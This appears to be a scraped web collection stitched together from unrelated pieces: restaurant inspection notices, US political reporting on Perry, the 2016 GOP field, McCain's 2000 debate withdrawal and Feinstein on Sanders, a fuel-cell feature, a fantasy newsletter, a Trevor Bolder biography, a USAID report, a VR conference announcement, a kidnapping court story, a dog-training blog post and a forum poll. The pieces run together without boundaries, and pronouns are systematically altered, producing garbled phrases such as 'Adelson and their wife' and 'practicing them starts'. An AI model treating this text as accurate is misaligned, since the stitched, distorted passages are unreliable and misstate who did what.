Current Status: Passed more recent inspection on Jan. 30, 2017 Gino's Pizza - 160 Main Street South
Date of Conditional Pass: Feb. 1, 2017
Reason for Result: Inadequate protection against pests
Current Status: Passed more recent inspection on Feb. 6, 2017 Sanjhi Rasoi - 1-2565 Steeles Avenue East
Date of Conditional Pass: Feb. 8, 2017
Reason for Result: Food not properly stored to prevent contamination, poor housekeeping
Current Status: Passed more recent inspection on Feb. 10, 2017 All Stars Classic Bar & Grill - 17-14 Lisa Street
Date of Conditional Pass: Feb. 9, 2017
Reason for Result: Food kept at improper temperatures, food not properly stored to prevent contamination
Current Status: Operating with conditional pass African Supermarket and Beauty Supply - 56-8887 The Gore Road
Date of Conditional Pass: Feb. 9, 2017
Reason for Result: Inadequate protect against pests
Current Status: Operating with conditional pass
Closed Hakka Town - 4-225 Castle Oaks Crossing
Date of Inspection: Feb. 10, 2017
Reason for Result: Location was not maintained free from health hazards, food kept at improper temperatures
UPDATE: This location has passed a more recent inspection on Feb. 13, 2017 and has reopened.
For more info on food inspections, click here.
When Texas Governor Rick Perry and the ultraconservative American Family Association announced a massive prayer rally, The Response, with the help of figures from the International House of Prayer and right-wing pastors Jim Garlow and John Hagee, the governor's office denied that their ultraconservative views would be incorporated into the August 6th event. The governor's spokesperson said that Perry's “priority with this event is bringing people together.”
But during an interview with the AFA's American Family Radio, The Response spokesperson Eric Bearse said that the main objective of the prayer rally was to bring people to Christianity. Bearse, who was previously Rick Perry's Director of Communications, claimed that people “regardless of their faith tradition or background” are invited to The Response to “seek out the living Christ” and feel the presence of Jesus:
Republicans have made no secret of their desire for a quick presidential primary fight aimed at rapidly producing a nominee to take on former secretary of state Hillary Rodham Clinton.
They almost certainly won't see that wish granted — thanks to the greatly crowded GOP field and a drastically reshaped fundraising landscape that could combine to keep the fight for the Republican nomination active until late spring, and maybe later.
Let's start with the size of the field.
At the moment, there are six announced candidates: Ben Carson, Ted Cruz, Carly Fiorina, Mike Huckabee, Rand Paul and Marco Rubio. By my count, there are at least nine others — including bold-faced names such as Jeb Bush and Scott Walker — who will be in the race by this summer.
That puts the field at 15 (and it could easily be a few candidates more), which would make it the largest Republican primary to date — eclipsing the 12 candidates who actively ran in 2008 and 2012.
The enormousness of the Republican field is due to a number of factors. The most obvious is that there is no strong front-runner a la George W. Bush in 1999, and so every GOP pol who has ever looked in the mirror and thought “Hello Mr./Mrs. President” is getting in.
But it's also become a winning business proposition for many second-tier (or lower) candidates to run for president. Think back to 2008. No one knew who Huckabee was before that race. By the time it ended, they were one of the hottest commodities in Republican politics — and cashed in (TV show, radio show, speeches, books) accordingly. Winning the nomination isn't the true goal for some of the 2016 candidates; upping their speaking fees and visibility is. (And I'm not even talking about Donald Trump.)
Then there is the rise of the ever-present super PAC. Virtually every candidate — from the Jeb Bushes of the world on down — has an “independent” organization aligned with their campaign. And that super PAC can collect checks for unlimited amounts — meaning that a single donor or two could finance millions of dollars' worth of ads for a candidate who might not be able to raise that sort of money in the $2,700 increments allowed by federal law.
[Why super PACs have moved from sideshow to center stage for presidential hopefuls]
We've already seen a glimpse of what this everybody-has-a-super-PAC world might look like. During the 2012 presidential primary, former House speaker Newt Gingrich was struggling to raise money after finishing fourth in the Iowa caucuses and the New Hampshire primary. But Gingrich had casino magnate Sheldon Adelson in their corner; Adelson donated $5 million to Gingrich's super PAC in the run-up to the South Carolina primary, which Gingrich won. All told, Adelson and their wife, Miriam, donated $16.5 million to Gingrich's super PAC; Gingrich raised $25 million total for their campaign committee.
Now, rather than just a handful of candidates with a well-funded super PAC, we could be looking at a dozen or more who have a setup similar to Gingrich's in 2012. And, although Bush's super PAC, which reportedly will have raised $100 million by the end of this month, gets all the attention, it's actually super PACs for the Fiorinas and Rick Perrys of the world that will prolong this race.
Traditionally — that is, in the time before super PACs — the way that the field was winnowed was via fundraising. A candidate underperformed expectations in Iowa or New Hampshire (or both), the fundraising spigot dried up, and they or they were forced to acknowledge reality and drop from the race.
Now, though, your aligned super PAC can function as a sort of campaign life support — keeping candidates alive for as long as wealthy donors want them to be around.
Gone is the incentive to drop out of the race; here is the incentive to stick around as long as possible because in a field this wide open and with so many super PACs spending so much money, who knows when your opportunity might come?
Then there is the ever-present uncertainty about the state of the primary calendar. What we know is that Iowa, New Hampshire, South Carolina and Nevada will be the first four states to vote. Beyond that, though, chaos reigns. There is talk of an “SEC” primary, named after the NCAA's Southeastern Conference, featuring a passel of southern states on March 1. And several more states are trying to push their way closer to the front of the calendar.
What a crowded early primary calender could mean is that candidates pick and choose states where they think they can run well, meaning that there is rarely, if ever, a state in which every candidate is playing hard at the same time.
Add up a historic number of candidates, a potentially limitless amount of funding and the potential for a series of different winners in the early going, and you see why Republicans seem likely to be fighting for their presidential nomination well into next spring and even, possibly, as summer begins.
The nightmare scenario for Republicans is a brokered convention fight — playing out in mid-July in Cleveland. We're not there yet. Yet.
Today's fuel cells boast longer lifetimes and shorter payback periods than their predecessors.
Despite this increasing affordability, the technology has yet to gain wide acceptance among alternative energy consumers.
However, fuel cells are poised to gain support as more industries find ways to defray their utility costs with the cells' heat and power generation.
Where to Use Them
Fuel cells are most efficient in applications where both the heat and power are used. Hotels, health clubs, and spas are natural fits because they consume large amounts of heat and power, but many other industries can reap benefits from the technology as well.
Cafeterias, laboratories, medical centers, and multifamily developments could power buildings with the electricity generated and provide domestic hot water warmed by the cell's heat.
The Octagon – Roosevelt Island, NY Size: 550,000 square feet, including 500 rental apartments Amenities: Heated outdoor pool, child daycare, fitness center, open-air tennis courts, clubroom, art gallery, general store, internet lounge LEED Certification: Silver Energy Needs: Base load of 600 kW with 24/7 demand for heat and hot water Efficiency and Utilization: Provides electricity to all residents and common areas with excess returned to the grid without reimbursement; 70% of waste heat utilized for domestic hot water and space heating Cost: $3.7 million, including $2.1 million for purchase and installation of the cell and integration with the existing system Incentives: Federal tax credits ($1 million), NYSERDA DG CHP Demonstration Program grant ($1.2 million upfront)
Applications with large power needs relative to their space, like data centers, could benefit greatly from the efficiency – about 42% for power, plus additional savings from heat recovery – while utilities could use power for grid stabilization or support. They can also be combined with existing solar or wind installations to ensure more reliable power delivery.
“Supermarkets are huge power users, and they get a lot of negative feedback about all the energy they pour into aisleways,” says Mike Upp, vice president of marketing for ClearEdge Power, a manufacturer of fuel cells for residential and small commercial applications. “That's an industry where you're going to see it adopted fairly quickly.”
Architect Bruce Becker, president of Becker + Becker, has deployed 400 kW fuel cells for both power and heat at two of their firm's properties: in the construction of 360 State Street in New Haven, CT, and as a retrofit project at The Octagon in Roosevelt Island, NY. Both are LEED-certified structures with 500 residential units and some retail.
The properties now pay just 6 cents per kilowatt for natural gas to fuel the cells, a steep drop from 22 cents, the average retail price for grid electricity in the area. This substantial savings will cut $200,000 to $300,000 off of each property's utility bill annually. With a 30% federal tax credit on each and substantial grants from both Connecticut and New York, Becker + Becker is set to achieve a payback of four to five years, well within their target range.
“Last month, the utility bill was $45,000 less than this month the prior year,” Becker says. “There are a lot of reasons to use these – environmental, efficiency, and energy policy issues – but there's a sort of basic economic motivation to it too.”
360 State Street – New Haven, CT Size: 700,000 square feet, including 500 rental apartments Amenities: Half-acre green roof with heated pool, art gallery, library, fitness center, yoga studio, theater, communal living room and kitchen, business center, children's playroom LEED Certification: Platinum Energy Needs: Base load of 475 kW with 24/7 demand for heat and hot water Efficiency and Utilization: Provides electricity to all common and commercial areas at 65% of the fuel cell's capacity, with excess sold back to the utility grid; 90% of the cell's waste heat is used for domestic hot water, space heating, and pool heating, with excess stored in thermal storage tanks Cost: Total investment of $3.5 million, including $1.8 million for the cell itself Incentives: Federal fuel cell tax credits ($1.2 million), Connecticut CEF fuel cell grant ($985,000), renewable energy certificate sales (approximately $50,000 per year), discounted gas rate
How to Navigate the Market
Costs vary from $4,000-$12,000 per kilowatt, though incentives are available, according to Mike Brown, vice president of government affairs and general counsel for UTC Power, which manufactures fuel cells for larger buildings and other large-scale applications. The price will likely drop as fuel cells gain wider acceptance, they add.
“As people focus more on carbon and the cost of emissions, fuel cells will see more traction in the marketplace,” Brown says. “We're right at the breaking point as far as cost to the consumer goes, and if we could get down to $2,500 to $3,000 a kilowatt, these would fit very nicely into a lot of applications, including some that might be somewhat borderline at today's pricing.”
You can generally expect a life of about 20 years out of your fuel cells, though it will probably be necessary to replace the cell stack after 10 years.
“Even if the whole unit was no longer functional after 10 years, it would still make economic sense,” Becker says. “We were also attracted to fuel cells because of the environmental benefits – there's no combustion with a fuel cell the way there is with other forms of combined heat and power, and these are residential properties, so I didn't want to create pollution on-site.”
Becker is currently evaluating the feasibility of installing smaller fuel cells on two more properties. The Octagon and 360 State Street are essentially grid-independent for power, though both are connected to the grid in case the fuel cells go down or require maintenance. Becker hopes a smaller fuel cell system will spread these benefits to additional buildings.
“I'm surprised that more owners and architects haven't been using fuel cells because they're such a green, economical solution,” Becker says. “In an age when there's such an importance placed on the environmental impact of energy use, there's nothing that comes close to the environmental superiority of fuel cells.”
Janelle Penny (janelle.penny@buildings.com) is associate editor of BUILDINGS.
This is one of the earliest copies of the Black Horse Newsletter. The second incarnation of The Black Horse Courier, the earliest newspaper known, the newsletter has provided the account of all distinguished and commemorable news for over eight hundred years. Originally only servicing Cyrodiil, the newspaper expanded after the Third Daedric Invasion to cover all of Tamriel.
It's had several incarnations with interruptions or closures do to conflicts like the Succession Crisis between 2a282 and 2a294, or the Crown Wars, from 2a643 and 2a659. But has retained itself and it's missive for the entirety of eight centuries.
Utilizing the Dread Crow messaging system provided by the Talons, the Black Horse collected news, and at the time this was published, distributed a two sided paper to major cities across the empire.
The 2a23 issue details the signing of the Refugee's Rest Treaty, merging Skyrim with the Morrowind Lands held by the Redoran House, along with several stories that illustrate the long recovery and aftermath of the Third Daedric Invasion.
Black Horse Newsletter is based out of Whiterun in Keizaal.
Trevor Bolder (9 June 1950 – 21 May 2013) was an English rock musician, songwriter and record producer.  They are best known for their long association with Uriah Heep and their tenure with The Spiders from Mars, the one-time backing band for David Bowie, although they also played alongside a variety of musicians from the early 1970s.
Biography [ edit ]
Bolder was born in Kingston upon Hull, East Riding of Yorkshire, England.[1] Their father was a trumpet player and other members of their family were also musicians. They played cornet in the school band[2] and was active in their local R&B scene in the mid 1960s. Inspired by The Beatles, in 1964 they formed their first band with their brother and took up the bass guitar.[3]
They first came to prominence in The Rats, which also featured fellow Hull musician Mick Ronson on lead guitar. In 1971 they were called in to replace Tony Visconti in David Bowie's backing band, which would soon be known as The Spiders from Mars. They subsequently appeared in D. A. Pennebaker's 1973 documentary and concert movie Ziggy Stardust and the Spiders from Mars.  They are name-checked as "Weird" (Bowie's stage nickname for Bolder)[citation needed] in the song "Ziggy Stardust" in the lyrics "Ziggy played guitar, jamming good with Weird and Gilly, And The Spiders from Mars".[4] Trevor "never looked comfortable as a glam-rock mannequin, tottering behind Ziggy Stardust in platform boots and a rainbow-hued outfit of latex and glitter".[3]
Bolder's bass (and occasional trumpet) work appeared on the studio albums Hunky Dory (1971), The Rise and Fall of Ziggy Stardust and the Spiders from Mars (1972), Aladdin Sane (1973), and Pin Ups (1973), the Spiders' swan song with their leader.[1][5] They went on to play on Ronson's 1974 album Slaughter on 10th Avenue which made the British Top Ten.
In 1976 Bolder joined Uriah Heep, replacing John Wetton. They worked on the albums Firefly, Innocent Victim, Fallen Angel and Conquest, when the line-up that had recorded the latter disbanded, Trevor alone was left with Mick Box, guitarist, founder-member and legal owner of the band's name. The attempt to put a new line-up together temporarily stalled and Bolder, needing to earn a living, accepted an offer in 1981 to join Wishbone Ash. Trevor had, coincidentally, again swapped places with John Wetton, becoming Wishbone Ash's bass player for their 1982 album Twin Barrels Burning. It was another short-lived connection, as by 1983 they returned to the rhythm section with Uriah Heep, playing on the Head First tour (although Bob Daisley played on the album) and all albums since.[5]
As well as their usual bass playing and backing vocal duties, Bolder also produced Heep's 1991 album Different World.[6]
In 2012 and early 2013, Bolder worked with Stevie ZeSuicide (Steve Roberts of the band U.K. Subs) as producer on singles "Wild Trash" (co-writer with ZeSuicide), "Lady Rocker" and a cover of "Ziggy Stardust".[7] Bolder also played on these tracks.
Bolder died in May 2013 at Castle Hill Hospital in Cottingham from cancer.[8] They had undergone surgery for pancreatic cancer earlier that year.[9]
Bolder playing a Fender Precision Bass signature bass guitar in 2006
Discography [ edit ]
With David Bowie
With Cybernauts
Cybernauts Live
With Dana Gillespie
Weren't Born a Man
With Ken Hensley
Free Spirit
From Time to Time
With Mick Ronson
With The Spiders from Mars
Spiders From Mars (1976)
With Uriah Heep
With Wishbone Ash
A US Department of State official said that USAID will spend nearly $1 billion in energy, economic, defense and civil society programs to counter Russian actions in Ukraine, Georgia, Moldova and Central Asia.
WASHINGTON (Sputnik) — The United States Agency for International Development (USAID) will spend nearly $1 billion in energy, economic, defense and civil society programs to counter Russian actions in Ukraine, Georgia, Moldova and Central Asia, a US Department of State official said on Tuesday.
"The countering Russian aggression total is $952 million dollars, and this expands resources in Ukraine, Georgia, Moldova, but also for other countries in Central Asia," the official stated. "Programs that we are supporting with these funds are… enhancing energy security, supporting financial reforms, trade and economic diversification and increasing some defense capabilities."
The State Department official noted that the aid to counter Russia in the listed countries and regions would also focus on eliminating corruption and supporting rule of law, among other civil society efforts.
USAID, the official added, is requesting a total of $34 billion in foreign assistance for fiscal year 2017, which is $1.1 billion less than fiscal year 2016.
In addition to countering Russia, the official explained, the $34 billion in foreign assistance will be dedicated to the crisis in Syria and Iraq, global health, climate change, food security, education and programs to assist countries vulnerable to extremism.
President Barack Obama is requesting $50.1 billion overall for fiscal year 2017 for the US Department of State and USAID, including $14.9 billion in overseas contingency operations, according to the State Department.
The Virtual Reality Developers Conference (VRDC), the premier event for creators of immersive VR (and AR) experiences, today announced dates and location for its second edition – its first standalone event. Bringing an expanded focus and new Advisory Board, the two-day event will bring together designers, programmers, business professionals, producers, artists, and audio practitioners to share best practices, demo new technology, create new business partnerships, and exchange ideas with innovators shaping the industry.
VRDC will take place November 2-3, 2016 in the Park Central Hotel in San Francisco, CA. To register or submit your speaking abstract by July 8, visit: vrdconf.com.
VRDC's Second Edition: November 2016
To meet the growing demand for high-quality content in the space, VRDC's second edition will expand to cover virtual and augmented reality in games, entertainment, brand experience, and a wide range of innovative use cases. Sessions from NASA and Chernobyl VR Project have been confirmed, reflecting the event's broad scope and top tier content.
"Now that VR platforms have hit the market, virtual experiences that entertain, inform, and provide entirely new ways to engage are increasingly in demand," explained Meggan Scavio, General Manager, VRDC and GDC. "We're thrilled to provide the highest quality content for VR developers, while exploring innovative applications for the technology across entertainment, healthcare, journalism, travel, manufacturing, retail, live events, real estate, training, and so much more."
Call for Submissions Now Open: VRDC is seeking the latest research and innovations in VR for November's lineup. Potential speakers may submit detailed technical and business-centric talks today through July 8, 2016. For more information, visit: www.vrdconf.com/conference/c4p/
New Advisory Board: An unprecedented advisory board of top names in VR will lead content for the show, including representatives from major platform holders such as Google (Noah Falstein), Oculus (Robert Stevenson), and Valve (Chet Faliszek), as well as creators behind experiences like Job Simulator (Alex Schwartz, Owlchemy Labs), Fantastic Contraption (Colin Northway) & VR experience experts like Pete Isensee (HBO Labs), Jazmin Cano (High Fidelity), Timoni West (Unity Labs), Tracey John (Havas Health) & Christina Heller (VR Playhouse).
Show Floor + Exhibitor Opps: VRDC will include a significant vendor area showcasing the latest innovations and advances in Virtual Reality. Those interested in exhibiting at this year's show should visit www.ubmgamenetwork.com/vrdc for more information.
VRDC's first edition was held alongside the Game Developers Conference (GDC) in March 2016 with two sold out tracks covering VR/AR for Games and Entertainment.
As part of the VRDC portfolio, organizers intend to continue running VRDC Game and Entertainment sessions alongside the Game Developers Conference in February 2017. More information on these sessions will be available in the near future.
Cats And VR
ctvtoronto.ca
A woman who has been charged with kidnapping their own child 18 years ago made a brief appearance in a Toronto court on Monday, after hiring high-profile lawyer Ed Greenspan as their legal representative.
Patricia O'Byrne, 54, was arrested in Victoria, B.C. last Thursday on charges of parental abduction. O'Byrne is accused of abducting their then-infant daughter in May 1993 while in the midst of a custody dispute with the girl's father.
O'Byrne's other lawyer, Todd White told reporters outside of the courtroom that the woman should not be kept in custody.
They said that people should hear the whole story before condemning O'Byrne. They also insisted that they are not a flight risk.
Joe Chisholm of Toronto has been searching ever since -- following leads across Canada and Europe -- and says he's thrilled that they might finally have a chance to connect with their daughter, who is now 20.
In YouTube videos they posted over the years, Chisholm recounted childhood memories and shared baby photos with the hope they would make contact.
"If you find me before I find you, which is fine by me, you'll have a lot of questions -- where you came from, who the rest of your family is, so on and so forth," they say in one video dated August 2008.
Police say their mother was arrested following a tip to the Missing Children Society of Canada that they might be living on Vancouver Island. O'Byrne, at times, was also thought to be in the U.K. or Spain.
In fact, they were living in B.C. under an alias and working as a government communications rep. They were also on the parental committee of their daughter's school.
On Monday, O'Byrne made a brief court appearance for a preliminary bail hearing. The Crown is seeking to have O'Byrne remanded. The conclusion of the hearing has been put off until Tuesday.
With a report from CTV Toronto's Austin Delaney
McCain Backs Out of Debate In California / Bush campaign claims senator is abandoning state
Image 1 of / 1 Caption Close McCain Backs Out of Debate In California / Bush campaign claims senator is abandoning state 1 / 1 Back to Gallery
With new polls showing their campaign dead in the water among California Republicans, Arizona Sen. John McCain has pulled out of a long-scheduled debate with Texas Gov. George Bush, set for Thursday in Los Angeles.
McCain campaign officials tried desperately yesterday to put the best face on their withdrawal, even as a new Field Poll showed Bush far ahead among likely Republican voters in the winner-take-all race for the state's 162 GOP delegates.
Top campaign officials attributed McCain's decision to Bush's earlier reluctance to appear at the debate.
"We had agreed to do this debate a long time ago, and Gov. Bush said they aren't going to do it," McCain spokesperson Howard Opinsky said yesterday. "We aren't going to hold our schedule together forever."
But Opinsky said McCain will debate Bush on NBC's "Meet the Press" Sunday, a national TV show that will reach millions of Americans.
Still, just last week, the McCain campaign was openly derisive of Bush's reluctance to commit to a California debate -- and promised its own candidate would be there.
"John McCain believes it's important for the people of California to see and hear the candidates talk about the issues," McCain communications director Dan Schnur told The Chronicle last week. "Thirty- three million Californians are worth that attention . . . and we'll be there, either way."
As recently as Thursday, when they were in California, McCain was talking about their plans to debate Bush; even last night, McCain's own Web site listed their California debate- watching parties. The CNN-Los Angeles Times debate was the only scheduled head-to-head meeting of the two candidates in California before the primary, a week from tomorrow.
McCain's campaign said the candidate confirmed to CNN on Thursday that they would not appear. But until yesterday afternoon, when rumors swirled about the pullout, McCain -- who has touted their "straight talk" politics -- gave no public indication that they intended to duck the nationally televised showdown.
The bait and switch on the debate left the Arizona senator -- whose favorite campaign line is "I'll always tell you the truth" -- wide open to blistering criticism from their rivals.
"Clearly, this is more double-talk from the McCain campaign," said Alixe Mattingly, a spokesperson for Bush. "Pulling out of this debate at the last minute is an indication that they're pulling out of California, where McCain's antagonistic message clearly isn't working."
The decision to avoid debating Bush clearly upset some of McCain's top advisers.
"It's definitely a mistake, but hopefully, the people of California feel strongly enough about the McCain reform agenda . . . to overlook a staff error and come out and vote for John McCain," said Schnur, a longtime California political operative. "John McCain is completely committed to California; unfortunately, our staff's position on this debate sends just the opposite message."
California Republicans have been worried all along that the two leading GOP candidates are not giving the nation's most populous state the respect it deserves. Bush's campaign stop in Los Angeles last week, for example, was their first visit to the state since November.
Bush supporters quietly reveled in McCain's surprise announcement.
"From a distance, it seems like the 'Straight Talk Express' is careening off the exit ramp in California," said Leslie Goodman, a Republican communications consultant and Bush backer, in a reference to McCain's campaign bus. "They claimed they'd make California a priority because it was win or die, and now they don't care enough to debate."
Although McCain's backers insisted that a devastating series of polls had no effect on the decision, the senator's chances of winning a Republicans-only primary in California have grown increasingly dim in recent days.
A Field Poll released today shows the state's Republicans backing Bush over McCain in the March 7 primary by a 48 percent to 28 percent margin in the contest for California's 162 convention delegates, a gap virtually unchanged from a Field Poll earlier this month. Other polls released over the weekend by the San Francisco Examiner and Time/CNN showed similar results.
Most of Bush's support comes from Republicans who identify themselves as strongly conservative. Among that group, Bush is favored by a 4-to-1 margin.
"That group seems galvanized and ready to vote for Bush," said Mark DiCamillo, director of the Field Poll. "It's going to be hard for McCain to break into that group."
Ironically, the rest of the poll is nothing but good news for McCain, a war hero who, in California at least, has extended their appeal beyond Republican voters.
In the state's open primary, where voters can choose from among all the presidential candidates regardless of party, McCain has seen their support among all likely voters surge from 10 percent in January and 15 percent earlier this month to 20 percent today, just 2 percentage points behind Bush and 8 points back of Democratic front-runner Al Gore's 28 percent. Democratic former Sen. Bill Bradley trailed with 10 percent.
It is becoming increasingly likely that McCain could beat Bush among all California voters, yet badly lose the Republican-only count that will determine who receives all the state's national convention delegates.
The new poll also bolsters McCain's claim that they would be a stronger candidate than Bush in November. In a head-to-head matchup, McCain beats Gore among likely voters in California by 48 percent to 41 percent, while Gore overruns Bush 51 percent to 41 percent. Bush also loses to Bradley, 47 percent to 43 percent, while McCain crushes Bradley, 52 percent to 35 percent.
McCain also has the best image of the top four candidates, with 57 percent of likely voters viewing them favorably, compared to 26 percent with an unfavorable impression. The new poll shows that for the first time, Bush's unfavorable rating is higher than their favorable rating, with 51 percent viewing them negatively, compared to 41 percent with a favorable impression.
"Everything in the polls seems to be going in McCain's direction, except the one that counts the most, which is the contest for the (Republican) delegates," DiCamillo said.
On the Democratic side, the poll shows Gore staying far ahead of Bradley, 54 percent to 16 percent, among likely Democratic voters.
"All the attention on McCain is siphoning any type of insurgent campaign momentum away from Bradley," DiCamillo said. "Gore seems to be running out the clock and is in a very good position to do that."
The poll is based on a telephone survey of 1,447 registered California voters conducted from Tuesday to noon yesterday. The margin of error is plus or minus 3.2 percentage points for the entire poll, 4.5 percentage points for the Democrat- only figures and 5 percent for the Republican-only figures, based on the size of the sample.
The poll represents a snapshot of voter opinion at the time it was taken and is not meant to predict the outcome of the vote.
FIELD POLL Open primary preferences among likely voters . -- Preference where Democrat, Republican and minor party candidates are listed on one ballot . Gore 28% Bush 22% McCain 20% Bradley 10% Keyes 4% Nader 3% Other 1% Undecided 12% . . -- Preference among Republicans (x) Includes Republican voters crossing over to vote for Democratic or other party candidates in the March 7 open primary in the following proportions: Bradley 2%; Gore 2%; Nader 1%; and all other candidates 1%. . Bush 48% McCain 28% Keyes 7% Other candidates 6%(x) Undecided 11% . -- Preference among Democrats Gore 54% Bradley 16% McCain 13% Other candidates 6%(y) Undecided 11% . (y) Includes Democratic voters crossing over to vote for Republican or other party candidates in the March 7 open primary in the following proportions: Bush 3%; Nader 2%; and all other candidates 1%. . This poll was conducted February 22-27 in English and Spanish among 1,447 likely registered California voters. It has an overall margin of error of plus or minus 3.2 percentage points. The Democratic voter sample has a margin of error of plus or minus 4.5 percentage points and the Republican voter sample has a margin of error of plus or minus 5.0 percentage points. CHRONICLE GRAPHIC
Sen. Dianne Feinstein defended Hillary Clinton from a recent State Department inspector general report. | Getty Feinstein: ‘All but over' for Sanders
California Democratic Sen. Dianne Feinstein on Sunday called on Bernie Sanders to consider suspending their campaign in an attempt to unify the party around front-runner Hillary Clinton.
“He ought to be able to read the signposts as well as anybody else, and if they did that, they would know that it's all but over,” Feinstein said on ABC's “This Week.” “I know the passion of a campaign. I know when you're in it, and you just keep go, go, go until the last hour is there. Well, the last hour is close by.”
Story Continued Below
Clinton stands a chance of securing enough delegates to put Sanders away on June 7 when California and other states hold their primaries. Sanders is focused on trying to halt Clinton's progress with a strong showing that day.
Feinstein also defended Clinton from a recent State Department inspector general report finding serious fault with how the former secretary of state handled their private email. Feinstein said the report shows, “The department does not handle these electronic platform operations well and needs to do better.”
“I mean, what do people want? This goes on and on and on,” Feinstein said. “Hillary Clinton broke no law.”
Here is a quiz. Let's say someone says, “Sit,” to a dog, intending the word as a cue.
What part of speech is the word, “Sit”? Then, what part of speech is the same word if we say, “Good sit!” afterwards?
That was a trick.
If we were talking to a human who speaks the same language we do, the first “Sit” could be an imperative or command verb. The second “Sit” would be a noun.
But neither of those, while grammatically correct, applies to training a dog. Dogs are not humans. “Sit” is something else entirely to them.
In dog training based on positive reinforcement, “sit” is a discriminative stimulus. To the dog it is not a word. It is not English. It is not eligible for grammatical analysis. It is an antecedent, in this case a specific sound that comes to indicate that reinforcement is likely available for the act of sitting. (I include the word “likely” because sometimes we don't reinforce every single sit.)
Examples of other discriminative stimuli for dogs are hand signals we give them, auditory cues such as whistles, and all sorts of things in life that act as cues that certain behaviors will be reinforced. These life events are not necessarily deliberate actions by us, and may not even be known to us. I wrote about some in my post called, “16 Behavioral Cues That I Didn't Train (But Are Still for Real).”
So if “Sit” is a discriminative stimulus, what is “Good sit”? I'll get there. First I need to talk about this problem with words and meanings.
I Can't Get It Out of My Head
We humans have an enormous problem to overcome when we use words as cues. When we hear the sounds that comprise the word “Sit,” in whatever language we speak, we can't divorce the meaning of the word “Sit.” We generally pick verbal cues that are descriptions of the behaviors they apply to. Convenient for us, but unfortunate for the dogs. We can't help but think they understand the cues as language.
Sometimes we pick more colorful words for cues for our amusement or because the standard word is inconvenient. My friend Marge's cue for their dog Zip to sit is, “Senta,” the Portuguese word for sit. “Sit” was too close to their name, plus they didn't want to spend their life sputtering out, “Zip, sit!” And although he's a Portuguese Water Dog, they didn't pick “Senta” because they innately understood it. They don't. They picked it because it's fun, clear, and didn't resemble any of their other cues.
I have a couple of fun cues. I use “Yoga” to cue Zani into the bow position (downward dog, get it?). I use “Rewind” to cue Summer to do a funny little backwards crawl/scoot. But hey, I'm a human, so I still hear these as words, with meanings. Not just a group of sounds. (And of course, the “funny” part has to do with their meanings…just can't get away from that, can we?)
The Curse of Knowledge
This inability to get the meanings of words out of our heads on behalf of our dogs is an intra-species example of the “curse of knowledge.” This refers to a situation where someone who knows something (in this case the human) can't imagine not knowing it. Here is a link to a good synopsis of a famous study, “tappers and listeners,” about the curse of knowledge.
In the tappers and listeners study, one person in a team of two would tap out the rhythm of a well-known song. The other person had to guess the song. The listeners could guess correctly only about 2.5% of the time. But get this: the tappers predicted that the listeners would know the answer 50% of the time.
The tappers heard the song in their heads as they tapped, and couldn't put themselves accurately in the place of the listeners, who were only hearing tapping. Even the most empathetic of us can't turn off the songs in our own heads.
In dog training, we are the tappers and the dogs are the listeners. It's worse though, because not only do they not know all these meanings and subtexts that are there for us, they are not capable of knowing most of them. Yet they read situations so well and are typically so attuned to us that they give the impression of knowing these things in the same way we know them. They have their own geniuses, but it is not likely that any dog understands language and grammar as we do.
By the way, I am not the first to tell about the “tappers and listeners” study with regard to some characteristics of dog training. Kathy Sdao describes it and even demonstrates it in their DVD “What Not to Err.” My friend Marge incorporates it into their orientation for beginning clicker trainers.
“Good Sit!”
OK, I finally made my way back around to this phrase. You can easily find dozens of websites that instruct you to say, “Good sit!” after your dog sits. Probably some of you have been instructed to do that. I have. I was told the following by an obedience instructor: “You should say, “Good sit” after your dog sits so they will know what it is they did right.”
This assumes that the dog can follow the leap from “Sit” as a noise meaning that sit will be reinforced, to “Sit” as a noun, modified by “Good.” This makes no sense. It only makes sense in our twisted world where verbal cues unfortunately have meanings that correspond to the actions we attach to them.
Here is an example that I hope demonstrates the faulty logic of “Good sit.”
The starter's pistol going off is a discriminative stimulus for people who run track. It indicates that pushing off the starting block and starting to run will likely be reinforced. So please envision this. A runner is practicing them starts. Today the coach is using a real starter's pistol so she'll get used to it. The coach fires the pistol, and the runner makes an excellent start. They run a few yards, stops, and turns back. The coach says, “Good…” and BANG! fires the pistol in the air again. The runner startles and says, “Why did you fire again? I'm not ready! I'm not even in the block.” The coach says, “I was telling you that you made a good…” BANG! and fires the pistol one more time.
With this example, we can clearly see that that the cue is not the same as the action. The coach means to tell the runner that they made a good start. **BANG** is not a description of the action of start. It's just the cue that indicates a certain action will be reinforced. Likewise, “Sit” is the noise that indicates to a dog that sitting will be reinforced. It does not somehow “mean” that action to the dog.
Frankly, I can keep this in my head only for short periods. It slides away so easily.
It's Not Harmless
Some might say, OK, it doesn't mean what we think it does, but it doesn't hurt anything to say it anyway. Well yes, there are worse things. But using, “Sit” as part of a praise phrase is not a desirable practice.
First, you are repeating the cue when the dog is already doing the behavior. This dilutes the one-to-one pairing of the cue and the action, diminishing the power of the cue. It also adds more chatter to the training session, creating more verbiage for the dog to sift through to try to catch words that might be cues. Or to learn to ignore them. Finally, I believe we need to do everything possible to understand the dog's point of view. Choose cues thoughtfully. Make sure they all sound different. Use them consistently, and only for that purpose. What if, instead of words in English (or your own native language), you had to use a randomly assigned color flash card or a complete nonsense phrase for every cue? Wouldn't they be kind of hard to remember? That's the position our dogs are in. They have to use brute memory on cues.
That last reason is the big one. Saying, “Good sit!” every once in a while or even regularly does little harm to the dog in the grand scheme of things. I'm sure I do half a dozen things to my dogs that are more confusing than that. The harm is to us as trainers. It keeps us entrenched in the belief that dogs understand language the same way we do.
If you are going to praise, far better to say, “Good!” or “Good girl!” or “Good dog!” And to say the same thing consistently. If you say it regularly before you give the treat, you are also building up a nice little conditioned reinforcer. But that's a post for another day!
Related Posts
Eileenanddogs on YouTube
© Eileen Anderson 2015 eileenanddogs.com
License for starting line photo.
Link to original starting line photo.
Like this: Like Loading...
SlowBullets Profile Blog Joined December 2011 United States 836 Posts #2
Poll: Who will win Semifinals A?
JangBi (128)
61%
ZerO (82)
39%
210 total votes (128)61%(82)39%210 total votes Your vote: Who will win Semifinals A? (Vote): JangBi
(Vote): ZerO
Poll: Who do you wish wins Semifinals A?
JangBi (140)
67%
ZerO (69)
33%
209 total votes (140)67%(69)33%209 total votes Your vote: Who do you wish wins Semifinals A? (Vote): JangBi
(Vote): ZerO
Poll: Most likely outcome?
JangBi > ZerO 3-2 (61)
28%
JangBi > ZerO 3-1 (54)
25%
ZerO > JangBi 3-2 (39)
18%
ZerO > JangBi 3-1 (37)
17%
ZerO > JangBi 3-0 (14)
7%
JangBi > ZerO 3-0 (10)
5%
